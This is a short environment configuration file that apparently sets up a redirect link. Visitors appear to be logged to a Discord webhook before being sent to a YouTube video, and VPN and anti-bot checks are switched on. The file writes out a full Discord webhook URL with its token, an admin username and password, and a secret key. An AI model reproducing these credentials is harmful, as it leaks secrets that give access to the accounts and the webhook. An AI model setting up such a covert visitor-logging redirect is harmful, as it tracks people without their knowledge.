DISCORD_WEBHOOK_URL=https://discord.com/api/webhooks/1338142323795824691/ox3HgetuOjqcKx-3AO1X6mb53Y-SfS8MBt3XU2M8GLVcgfNPE85Gk2Y8e5TDVYdsKUwt
REAL_URL=https://youtu.be/kk3_5AHEZxE?si=0RnrfrvHJIiHqes7
REDIRECT_DELAY=5
LOGGING_LEVEL=INFO
VPN_CHECK=1
ANTI_BOT=1
ADMIN_USERNAME=SlonyaraZ782
ADMIN_PASSWORD=5H4CD2-HiuGw4jfEtLiAVzdnqiHKHWWpxD0
SECRET_KEY=MsrOEnDfFHxOHgXFvkJaYF7oHASE0JMwrFXyIiw